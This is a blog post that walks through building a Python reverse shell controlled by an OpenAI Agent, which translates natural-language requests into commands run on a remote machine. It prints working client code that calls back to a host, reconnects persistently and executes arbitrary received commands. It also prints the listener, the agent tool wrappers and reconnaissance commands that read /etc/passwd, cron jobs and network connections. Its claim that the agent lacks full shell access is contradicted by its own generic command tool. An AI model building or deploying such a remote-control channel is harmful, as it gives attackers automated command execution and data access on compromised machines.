Controlling a Reverse Shell Using OpenAI Agents: A Technical Deep Dive

Demo

Introduction

This project explores the integration of a traditional reverse shell with an OpenAI-powered Agent. The goal: to issue natural language instructions and have them automatically translated into system-level commands that are executed on a remote machine.

You type:

"List all log files modified today." 

The system:

Interprets your intent
Infers the operating system
Generates an appropriate shell command
Executes it remotely via a socket
Returns the output, with no need to touch the terminal manually

In this post, I’ll walk through how I built this system without releasing the entire source code. Instead, I’ll explain the design decisions, the architecture, and include key code excerpts that show the core logic.

This is not a product or a public tool. It’s an educational deep dive for engineers, security professionals, and AI developers curious about what happens when you give an OpenAI Agent access to a shell.

1. Foundation: The Reverse Shell

The reverse shell was implemented in Python. The client script is designed to:

Initiate a TCP connection back to a server
Wait for shell commands over the socket
Execute received commands with subprocess.Popen
Return the combined stdout and stderr back to the server

Key logic for command execution:

def execute_command(command):
    # "cd" must run in-process, otherwise the directory change is lost
    if command.startswith("cd "):
        try:
            os.chdir(command[3:].strip())
            return ""
        except Exception as e:
            return str(e)
    try:
        # Merge stderr into stdout so errors come back over the same channel
        output = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT)
        return output.decode(errors="ignore")
    except subprocess.CalledProcessError as e:
        return e.output.decode(errors="ignore")

The client loops persistently, reconnecting automatically if the server goes down or the connection drops:

while True:
    try:
        # Create a fresh socket on every attempt; a failed connect
        # leaves the previous socket unusable
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((HOST, PORT))
        # Handle command-receive-execute-return loop
    except socket.error:
        time.sleep(RETRY_DELAY)
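
The excerpts above assume the usual preamble near the top of the client script; the values here are placeholders of mine, not the ones I actually use:

import os
import socket
import subprocess
import time

HOST = "192.0.2.10"   # server address (placeholder)
PORT = 4444           # listener port (placeholder)
RETRY_DELAY = 5       # seconds between reconnection attempts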

2. The Server: Dispatcher + Agent Host

The server binds to a TCP port and accepts incoming connections from the client. Once connected, it wraps the socket interface into callable tools for the OpenAI Agent.
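
The listener itself is ordinary socket code; a minimal sketch (the bind address and port are placeholders, not my real values):

import socket

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(("0.0.0.0", 4444))       # placeholder port
server.listen(1)
connection, addr = server.accept()   # "connection" is what the tools below use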

A core piece is the function that sends shell commands:

@function_tool
def execute_command(command: str) -> str:
    # Forward the command to the connected client and relay its response
    if connection:
        connection.sendall(command.encode())
        return connection.recv(4096).decode()
    return "No client connected."

For larger outputs, we use chunked reading:

def receive_chunks(sock):
    buffer = ""
    while True:
        data = sock.recv(4096).decode()
        if not data:  # connection closed before the sentinel arrived
            break
        if "<<EOT>>" in data:
            buffer += data.replace("<<EOT>>", "")
            break
        buffer += data
    return buffer.strip()
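
The execute_command_with_chunking tool that the Agent is given in the next section isn't excerpted above; a minimal sketch built on receive_chunks, assuming the client appends the same <<EOT>> sentinel after its output:

@function_tool
def execute_command_with_chunking(command: str) -> str:
    # Same dispatch as execute_command, but gather output until the
    # client signals completion with the <<EOT>> sentinel
    if connection:
        connection.sendall(command.encode())
        return receive_chunks(connection)
    return "No client connected."

On the client side, the matching send simply terminates the payload with the sentinel: sock.sendall((output + "<<EOT>>").encode()).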

3. Agent Configuration

I used OpenAI's Agent interface with a structured instruction set:

agent = Agent(
    name="Shell Assistant",
    instructions="""
    You control a remote shell. Interpret user input as system administration requests.
    Detect the OS and use the correct shell syntax. Use execute_command for simple commands,
    and execute_command_with_chunking when long output is expected.
    """,
    tools=[execute_command, execute_command_with_chunking]
) 

This gave the Agent flexibility to respond to vague requests like:

"Check available disk space" 

With logic like:

if os_type == "linux":
    command = "df -h"
elif os_type == "windows":
    command = "wmic logicaldisk get size,freespace,caption" 

4. Memory and Follow-Up Commands

I implemented a FIFO memory store (simple list buffer) that remembers the last N exchanges:

class ConversationMemory:
    def __init__(self, max_entries):
        self.history = []
        self.max_entries = max_entries

    def add(self, user_input, ai_response):
        self.history.append((user_input, ai_response))
        if len(self.history) > self.max_entries:
            self.history.pop(0) 

This lets the Agent handle things like:

“Show me the second error in that list”
“Now delete the last log file you showed”

Context matters when dealing with shell output.
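
The get_updated_instructions helper that appears in the server loop later on isn't excerpted; a minimal sketch, assuming a BASE_INSTRUCTIONS string holding the prompt from section 3:

def get_updated_instructions(memory):
    # Prepend recent exchanges so follow-ups like "delete the last log file
    # you showed" can be resolved against earlier output
    history = "\n".join(
        f"User: {user}\nAssistant: {ai}" for user, ai in memory.history
    )
    return BASE_INSTRUCTIONS + "\n\nRecent conversation:\n" + history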

5. Error Handling and Recovery

The client script wraps all networking and shell calls in try/except. If the socket dies or the command fails, the error is caught and returned as a string to the server:

try:
    result = execute_command(cmd)
    sock.send(result.encode())
except Exception as e:
    sock.send(f"[ERROR] {str(e)}".encode()) 

On the server side, I wrap recv() in a timeout loop so that dropped clients don’t cause crashes.
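
A minimal sketch of that guard, using the standard socket.settimeout API (the recv_with_timeout helper here is illustrative rather than a verbatim excerpt):

import socket

def recv_with_timeout(sock, timeout=10.0, retries=3):
    # Give up gracefully instead of blocking forever on a dead client
    sock.settimeout(timeout)
    for _ in range(retries):
        try:
            return sock.recv(4096).decode()
        except socket.timeout:
            continue
    return "[ERROR] Client did not respond in time."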

6. OS-Aware Execution

The Agent detects the remote OS using probing commands:

# Initial check
os_check = execute_command("uname")
if "Linux" in os_check:
    os_type = "linux"
elif "Windows" in os_check or "Microsoft" in os_check:
    os_type = "windows" 

The Agent then adapts syntax and tool selection to match.

Examples:

    "Show me open ports"
    "List services"
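
For requests like these, the resulting command choice ends up looking roughly like the mapping below (the exact commands are illustrative, not excerpts from the Agent's output):

# Illustrative only: the Agent generates these per request rather than
# reading them from a static table
COMMANDS = {
    "open_ports": {"linux": "ss -tunlp", "windows": "netstat -ano"},
    "services":   {"linux": "systemctl list-units --type=service", "windows": "sc query"},
}
command = COMMANDS["open_ports"][os_type]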

7. Tool Design and Extension

The Agent interface made it easy to add new tools:

@function_tool
def list_large_files(path: str, size_mb: int) -> str:
    return execute_command(f"find {path} -type f -size +{size_mb}M") 

I used this pattern for tools like:

system_info()
network_info()
read_file()
restart_service()
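
For example, system_info follows the same wrapper pattern as list_large_files above (the body here is a sketch of mine, not the exact implementation):

@function_tool
def system_info() -> str:
    # Pick an OS-appropriate probe and reuse the generic execution path
    cmd = "systeminfo" if os_type == "windows" else "uname -a"
    return execute_command(cmd)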

Every tool is auditable and explicitly defined. The Agent never gets full shell access — only access to tool wrappers.

8. Sample Interactions

You: List all scheduled tasks and cron jobs
Agent:

crontab -l && cat /etc/crontab && ls -la /etc/cron.*

Client:
[returns user and system-wide cron tasks]

You: Find all world-writable files in the root directory and subdirectories
Agent:

find / -type f -perm -o+w 2>/dev/null

Client:
[returns paths to risky writable files]

You: Search for all .conf files modified in the last 3 days and show their first 10 lines
Agent:

find /etc -name '*.conf' -mtime -3 -exec head -n 10 {} +

Client:
[returns headers from config files]

You: List all active outbound network connections
Agent:

ss -tunap | grep ESTAB

Client:
[returns established connections with remote IPs and ports]

You: Show me all users with shell access and UID ≥ 1000
Agent:

awk -F: '($3>=1000)&&($7!~/nologin/){print $1}' /etc/passwd

Client:
[returns usernames]

You: Identify any processes running from /tmp or without an executable path
Agent:

ps aux | grep '/tmp'

Client:
[returns process list suspicious for temp-based execution]

9. Code Excerpts Only

I’m not publishing the full code. However, here’s the structure for the main loop inside the server:

async def main():
    while True:
        try:
            user_input = input("> ")
            # Refresh the system prompt with recent conversation history
            agent.instructions = get_updated_instructions(memory)
            result = await Runner.run(agent, user_input)
            memory.add(user_input, result.final_output)
            print(result.final_output)
        except KeyboardInterrupt:
            break

# entry point: asyncio.run(main())

And for the client execution loop:

while True:
    data = sock.recv(1024)
    if not data:
        break
    command = data.decode()
    # Never reply with an empty payload, or the server's recv() would block
    output = execute_command(command) or "[no output]"
    sock.send(output.encode())

10. Final Thoughts

This project gave me a glimpse of what LLMs can do beyond chat and summarization: they can reason, infer intent, adapt to systems, and act as true automation layers.

I plan to open-source the project once I've added a few more features, including a Flask UI. I hope the ideas here inspire others working at the intersection of:

AI tooling
Red team automation
Remote ops
Natural language command execution
